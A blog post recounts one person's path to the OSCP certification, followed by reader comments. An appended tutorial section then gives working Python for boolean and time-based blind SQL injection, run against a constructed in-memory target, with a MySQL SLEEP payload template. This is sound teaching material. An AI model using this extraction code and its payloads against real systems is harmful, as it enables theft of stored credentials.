Down with OSCP?? Yea, you know me!

Back in February of last year, I had finally saved up enough pennies to purchase the Penetration Testing with Kali Linux course. I was not fully aware of what I was getting myself into, despite reading the syllabus. As a side note, if you are planning to take this course, please prepare yourself for the headaches, frustration, and especially…time! You’ll need quite a bit of that. Make sure you are decent with networking and know your way around a Linux environment, or you are going to be hurting. Basic knowledge of scripting with your favorite language is always a plus 🙂

If you aren’t already aware (and you should be if you’re reading this), the PWK is a very technical course that throws curve balls and actually tests your technical ability. I entered the course not knowing very much besides using a tool here and there and hoping stuff works, as any other new guy does. I was really excited when I came across Offensive Security and immediately knew this was the one for me.

To purchase, you need a non-free email address, i.e. not Yahoo, Gmail, or any of the like. If you were like me and used one of those, you had to provide additional ID. In my case, I just used my driver’s license. Finally, after waiting a week, I received my material.

The Lab

The lab…the lab is like no other. It’s your very own playground that ranges from Windows XP and Windows 8 to Windows Server and Linux machines. You name it, it’s in there. This is the spot to practice what you learn from the videos and/or PDF. It consists of your public network plus the IT, dev, and admin departments. You will be doing webapp, binary, and client side attacks. You will also be doing privilege escalation and…PIVOTING. That was a crazy concept to wrap my head around, but I was finally able to get it 🙂

The awesome thing is…since this is a self-study course, you’re essentially thrown into the deep end of the water. It’s just you, your material, and your lab time with no sense of direction. Sounds so scurry!! I was able to get quite a few machines. Unfortunately, I wasn’t able to unlock the admin network. Bummer. It’s not too bad I suppose.

The EXAM

The exam is 24 hours. Depending on your ability, it can take you as little as a few hours or take up to almost the full 24 hours…hopefully, that won’t be you! 😮 If so, who cares?! 🙂

I read the PDF that gets sent to you telling you the dos and don’ts. It also has the restrictions on Metasploit. Whoa. Ok. You can only use it once and ONLY once.

The first time I logged in to the network…it was alien to me. I had run my scans and I already knew I wasn’t ready. Unfortunately for me, this isn’t like any other OSCP review where I pass on the first round. So I did what any other normal person would do…bought an extra 30 days and fought the good fight, haha!! They weren’t consecutive though.

I spent several months learning and going over the course material again. This time I was hanging out in the Exploit-DB, going over exploits and how they’re made, and dabbling more and more in Python. Everything started coming together more and more once I started, and for the next several months…I was breathing sec. Living it, learning it, loving it 🙂

Path to Redemption

After my 30 days were up, I created my own lab with known vulnerabilities and gave myself a variety of exploits to play with. I spent more months, an ungodly amount of man hours, and lots of keyboards learning everything I could and everything that was covered in the material. I felt so proud of myself because I was steering myself away from being dependent on Metasploit. I had finally put my big boy pants on 🙂 During the course of this time, I focused mainly on buffer overflows, privilege escalation, scripting, porting Metasploit exploits, and generating payloads using MSFvenom, since they killed off MSFpayload and MSFencode. By the way, MSFvenom for the win!! I also got in the habit of making Google and Exploit-DB my friends 🙂 You only get one use of Metasploit, but I made the choice to not use it at all, with the exception of the multi/handler, which isn’t as bad as it sounds. I purchased an extra 15 days, compromised more machines, and got comfortable with what to do. I signed up for my exam once again.

Alas! The test day had arrived! So, logging in…I started enumeration on my target machines and actually knew what I was doing this time. There were a couple easy ones and a few tricky ones. The tricky ones outweighed the easy ones, haha! A little more than 10/11 hours in, I had documented everything I had done for my report and gained root/admin privileges on all machines except one. That one. And it was giving me quite a fight! After a couple more hours, I waved the white flag and called it quits 🙁 I lost. It won the fight. It took me a little bit of time to complete, but you know what? I was able to gain root/admin on 4 machines and a limited shell on 1. A limited shell is better than no shell. I called it a day 🙂

The next thing to do was to write the report and submit my documentation! Oh! Did I mention that you need to write the report WITH the screenshots of your loot as well?? If you don’t submit, you just don’t pass 🙂 You’re given another 24 hours to complete the report. Once I emailed my docs, I waited for my results 🙂

Hanging out at work, I received an email at 10:26am on October 21 stating I had received my OSCP Certification. What a feeling that was! I threw the papers off my desk, knocked the computer over and walked out the office like a BOSS. Then went back inside because I still needed my job.

My Thoughts

This course was fairly difficult, but I had such an AMAZING time doing this and learning along the way. All my hard work had finally paid off. There are plenty of resources online to guide you in the right direction. If you put forth the effort, dedicate the time, try for yourself and not get spoonfed…I promise you, you can do it also!

Also, this course isn’t for you if you are the type to want to get spoonfed. You’ll find out really quick, haha! Anywho, I Tried Harder and became part of the Offensive Security Certified Professional club 🙂 W00t!!

For those of you that are thinking of taking this course, please do! It’s highly rewarding!! And remember folks….ENUMERATION IS KEY!!!

My next goal is to work on Cracking the Perimeter. I still have a few things to learn, and I’m almost positive I’m a sadist due to all the pain the PWK has caused me…yet here I am, begging for more!

Some resources you may find helpful are:

  1. Fuzzy Security
  2. G0tmilk’s Privilege Escalation
  3. Google, hehe 😉

4 thoughts on “Down with OSCP?? Yea, you know me!”

  1. While reading this, it has given me a lot of insight into the end test, and that with dedication and perseverance anything is possible! Good job bro, keep up the awesome work!

    -SP

  2. I’ve learned so much on your blog. I just finished the IMF vulnhub boot2root and it was a crazy challenge, complete with a socket based buffer overflow for a custom program. I was able to do it, w00t. It took me about 6 hours due to some hiccups along the way (certain libraries not being installed locally to run the program with gdb, learning new techniques, etc.), but overall I felt a lot more confident in performing a buffer overflow out of the box, so to speak. It was a little different using gdb instead of Windows based disassemblers. Anyway, one thing did make me a bit nervous for the OSCP: I had to use sqlmap to perform the sqli as it was full blind. I know I can’t use sqlmap with it and that’s in and of itself not a problem. I can do a generic union based sqli and even evade some WAFs, but when it comes to a time based one or full blind in general I end up needing sqlmap. I can get it to start delaying to let me know it’s accepting my queries, but I don’t know what to do when I can’t dump to the page.

    What are your suggestions? Would you say SQLi is limited in complexity on the OSCP?

    Also finally dropping metasploit (also except for the multi/handler) is such a great feeling. No disrespect for the tool, but damn low level knowledge beats all.

    Anyway, thanks for all your help! Good luck on CTP!

    1. I’m glad you did man! I’m sure there were some parts that blew your mind but you kicked ass and got that sweet, sweet shell 😉

      No need to worry. My web game is pretty horrible and I will be the first to tell you that! You really can’t use sqlmap because it’s an automated exploitation tool. What do you learn from that?? 😉
      Believe it or not, it is actually encouraged to practice using tools (sqlmap/metasploit being some examples). If the web game is where you want to end up heading down, by all means go for it! I see you running into no problems that will make you give up. Just don’t quit 😉

      As for your SQL question, I can’t really answer that, as some people’s levels are higher/lower than others. If I was able to get by and successfully exploit it in the labs, I’m sure you can too. My biggest recommendation would be to hang out in the Exploit-DB site in the web section, search for sql, download the provided application, install it, and go to town! That’s how I did it, and I learned just as much setting it up just to break it. It was an interesting ride, that’s for sure. That goes for everything else on that site. It’s good exercise. I would also suggest turning some of the DoS PoCs into full blown RCEs. That would be sick.

      I know exactly how that feels. Keep kicking ass man and don’t give up! Remember, if it were easy, everyone would be doing it 😉
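The fully blind case the commenter describes above (the injection is confirmed, a delay shows the query is being evaluated, but nothing is ever echoed to the page) is handled by treating the target as a yes/no oracle and pulling the data out one character at a time. The following is an added example, not code from the original post or from either commenter. The "application" is a constructed in-memory SQLite stand-in for a login page that only reveals whether a user exists; the names `vulnerable_user_exists`, `BooleanOracle`, `make_time_oracle`, `extract_string` and `extract_admin_password`, the assumption that a valid username (`admin`) is already known, and the MySQL `SLEEP()` template shown in the time-based variant are all assumptions for illustration.

```python
"""Blind SQL injection: recover data through a yes/no oracle.

Added example. The target below is a constructed stand-in (an in-memory
SQLite database queried by string concatenation); nothing here is code
from the original post or its comments.
"""
import sqlite3
import time
from typing import Callable

# --- constructed vulnerable target (stand-in for a real login page) ------
_conn = sqlite3.connect(":memory:")
_conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
_conn.execute("INSERT INTO users VALUES (1, 'admin', 'S3cr3t!'), (2, 'bob', 'hunter2')")
_conn.commit()


def vulnerable_user_exists(username: str) -> bool:
    """Simulated page that only reveals 'user exists' / 'no such user'.

    The query is built by concatenation, so `username` is injectable, but
    no column value is ever echoed back: a fully blind injection."""
    sql = f"SELECT id FROM users WHERE username = '{username}'"
    try:
        return _conn.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False  # an error page reads as "no" to the attacker


# --- oracles: turn one injection point into an answer to "is COND true?" --
class BooleanOracle:
    """Answer a SQL condition by whether the page says the user exists."""

    def __init__(self, check: Callable[[str], bool]) -> None:
        self.check = check
        self.queries = 0  # how many requests the extraction cost

    def __call__(self, condition: str) -> bool:
        self.queries += 1
        # 'admin' is a known-valid user, so the page flips only on `condition`.
        # The trailing comment swallows the application's closing quote.
        return self.check(f"admin' AND ({condition}) -- ")


def make_time_oracle(request: Callable[[str], object], template: str,
                     delay: float = 3.0) -> Callable[[str], bool]:
    """Same interface when the page gives nothing away at all: read the
    answer from response time. `template` holds the DBMS-specific delay
    primitive with a {cond} placeholder, e.g. for MySQL (assumed form):
        "admin' AND IF(({cond}), SLEEP(3), 0) -- "
    `request` is whatever sends the payload to the target (an HTTP call).
    Not exercised by the demo below; the SQLite stand-in has no SLEEP()."""
    def ask(condition: str) -> bool:
        start = time.perf_counter()
        request(template.format(cond=condition))
        # keep a margin below the full delay so jitter does not flip answers
        return time.perf_counter() - start >= delay * 0.8
    return ask


# --- extraction loop: the part sqlmap normally does for you ---------------
def extract_string(ask: Callable[[str], bool], expr: str, max_len: int = 64) -> str:
    """Recover the text value of SQL expression `expr` one character at a time.

    A binary search over the code point needs 7 oracle calls per character
    (range 0..127) instead of up to 95 for guessing each printable in turn.
    Functions are SQLite's: length(), substr(), unicode(). MySQL/MSSQL use
    ASCII(SUBSTR(...)) / ASCII(SUBSTRING(...)); the loop is unchanged."""
    out = ""
    for pos in range(1, max_len + 1):
        if not ask(f"length({expr}) >= {pos}"):
            break  # ran past the end of the value
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if ask(f"unicode(substr({expr}, {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        out += chr(lo)
    return out


def extract_admin_password() -> tuple[str, int]:
    """Pull the admin password out of the blind target and report how many
    requests it took."""
    oracle = BooleanOracle(vulnerable_user_exists)
    secret = extract_string(oracle, "(SELECT password FROM users WHERE username = 'admin')")
    return secret, oracle.queries


if __name__ == "__main__":
    pw, n = extract_admin_password()
    print(f"admin password: {pw!r} recovered in {n} requests")
```

Swap the oracle, keep the loop: with a time-based injection the only change is that `ask` measures the response instead of reading the page, so the same binary search recovers a 7-character value in 57 requests (one length probe plus 7 comparisons per character, plus the final length probe that fails) rather than several hundred with linear guessing. The margin in the time oracle matters in practice: network jitter on a 3-second sleep is what makes hand-rolled time-based extraction return garbage, so repeat any character whose answer sits near the threshold.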
